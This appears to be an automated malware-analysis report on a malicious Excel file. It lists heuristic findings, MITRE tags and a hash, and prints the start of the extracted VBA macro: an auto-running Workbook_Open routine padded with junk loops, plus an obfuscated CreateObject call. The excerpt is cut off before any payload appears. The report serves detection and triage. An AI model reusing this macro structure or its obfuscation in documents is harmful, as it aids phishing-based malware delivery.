MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel document containing a Workbook_Open VBA macro. This macro utilizes a Shell() call and CreateObject, indicating it's designed to execute arbitrary code, likely to download and run a secondary payload. The VBA code is heavily obfuscated, making it difficult to determine the exact payload or destination, hence the 'unknown family' classification.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15799 bytes |
SHA-256: dccf55e3a98374352a3c1e7c4c454a4ea4dcf21099fb2820d2ccf8cf77b358f8 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
Xb5IWYK.Kn1Qj1GkRHt8Ek_pgCaa
While 9 = 4371
Dim VWrY_NOx_ESiuLftgJSRNw24B2K85OI3httw5ZQTjSkKxIK3DTHVrGKhdxW As Variant
Wend
Dim FCQ2s6YA_b As Integer
While 10 = 2477
Dim sxE29r5Kp_1oR3jEvIYhJQFCIQQZ1NWGJYSeCdsYPUwreatW As Variant
Wend
Dim PlIOkaPZpB As Integer
While 23 = 7052
Dim rpYcSaprc2hDCQZ9PxcXgrf4HN_GfsG3y_uB_vBUAv71xLi1xkIa6Qd9HeS As Variant
Wend
Dim UgJtsoNBeX9dvGV As Integer
While 28 = 7895
Dim tto_6oLR5ho7fev2db7_cjKFH7fUYloox5sMcYVYHMOKD As Variant
Wend
Dim rqfsecAyF3Hh As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Xb5IWYK"
Dim PP1RiHGCTh67gWOwf8QQSa5gV5U2mQtF1rZrSWsHa3RqtdG_t_mVJw6yTS6mwNYBwyEy7fbGMHzYHMw1 As String
Function g59G13Q2_HkugWD_g1NT9CZN9l3GmzpBjo5dWPQT8SCiEtKFY(I8KiXLeX4A_5NhVxeIUYPRq_Jea1bV5kkWBIL8qYJ2_KsRExwcxgGcMzOJX3tn6g_bR1eLkgb6MXMdP2YmC8gVbFHK4Bixof5gEO9NQj2P_KNylt3ebEj79r9KqSQi7mOqbpX_2JTbEO)
While 4 = 2838
Dim pjS_ZZMLHdFRtPu4xgEhVG73UIIVTJj8LqmafynxWmnxGTAVSk9KwI As Variant
Wend
Dim dglYnOPz174GEC As Integer
While 24 = 5396
Dim mSV82QIrcHt_HvCrJWJCK_xEJWffup39N7s9NAR As Variant
Wend
Dim e9uDcnmFcwGue7C As Integer
While 28 = 7492
Dim geOwctm7vNuuJBDcIDnCY_SZgPCsl4WAJEKb8LxtTxQN315ar As Variant
Wend
Dim mkZR9ZfJxOLq3S1 As Integer
Dim Eup2j5eKVw3CEvUm8rc9WO2kgkMKDqJVEYt5_jBNeuUy7_agnmooUB6z3DS9qSGolf7pBZhWoMcl3BnbHofYAdADc4B_OBgKloLYGudM_Q9FhR6zYzyAvrnFd3LGXhFlpQ9MyMTVIRTrd3d
While 11 = 1428
Dim siDzje6N3qkr_foUj_9R6rKonQH7kCacYWIPzjG As Variant
Wend
Dim GnJXPxwEPizE2T As Integer
While 10 = 6925
Dim g4_WXJRU9lzOFRqVWd92zntS4zzJ2Vu7hH1bI As Variant
Wend
Dim aXyvoghApdX4KUE As Integer
While 14 = 8626
Dim c3IpbgTFcl12q8ZNKdCiBD9Kt3HTv7JXz As Variant
Wend
Dim gn8QbY3DqQCoo As Integer
Dim QiDSctSx3beWCifRDaRpLZ694BXnvfb95TX8_qEscDp_QHiucshsU_KzmDYZUnBU9eaqIhMUUhKHtzqubmJB8smzHhTAQnWyBS
While 12 = 3467
Dim SrDHqpQe8X475hW9TeZbBHRb6rDIeTu5e_iZPlN As Variant
Wend
Dim cESiNCSgzdDVvk As Integer
While 23 = 4821
Dim LmIXjL8lG_mm8az97qqO7UqhCYkJMnZ79SQaYApXP18S6kD2q1f As Variant
Wend
Dim Unem15jUJkwXbho As Integer
While 24 = 2839
Dim mmHXi5AQ9EWWlZTrcUFDQcoZexodwbbdtP8YsRQkS As Variant
Wend
Dim Vegcg84z2S As Integer
While 25 = 419
Dim BUdVI7r2tNfcem3mUb49JDes57G78zun5HYHN3xb_YfUw2 As Variant
Wend
Dim j4ka62G8ytaK As Integer
While 27 = 8663
Dim yu44c2hULtWama8tfH5C7MUDMSrB_aRdaklNek25SmpzfHw As Variant
Wend
Dim c3WZpxXNkX As Integer
While 24 = 9529
Dim ypHIeTuZ2_AxsN5O_sRfegDfMHl_loCVAzo5suwQ5XmHu As Variant
Wend
Dim oIHeYxo5_2Q As Integer
Set QiDSctSx3beWCifRDaRpLZ694BXnvfb95TX8_qEscDp_QHiucshsU_KzmDYZUnBU9eaqIhMUUhKHtzqubmJB8smzHhTAQnWyBS = CreateObject(PP1RiHGCTh67gWOwf8QQSa5gV5U2mQtF1rZrSWsHa3RqtdG_t_mVJw6yTS6mwNYBwyEy7fbGMHzYHMw1)
While 27 = 2701
Dim kl5VrtxL7nw2h9fM5AjF45th8cdK1WZ57VREyYiJiYJE1Pie2is4cuWp As Variant
Wend
Dim VXNNkUiM15JoY As Integer
While 22 = 2836
Dim XdZXfcsmpp38SPmeZK9kNbAT58
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.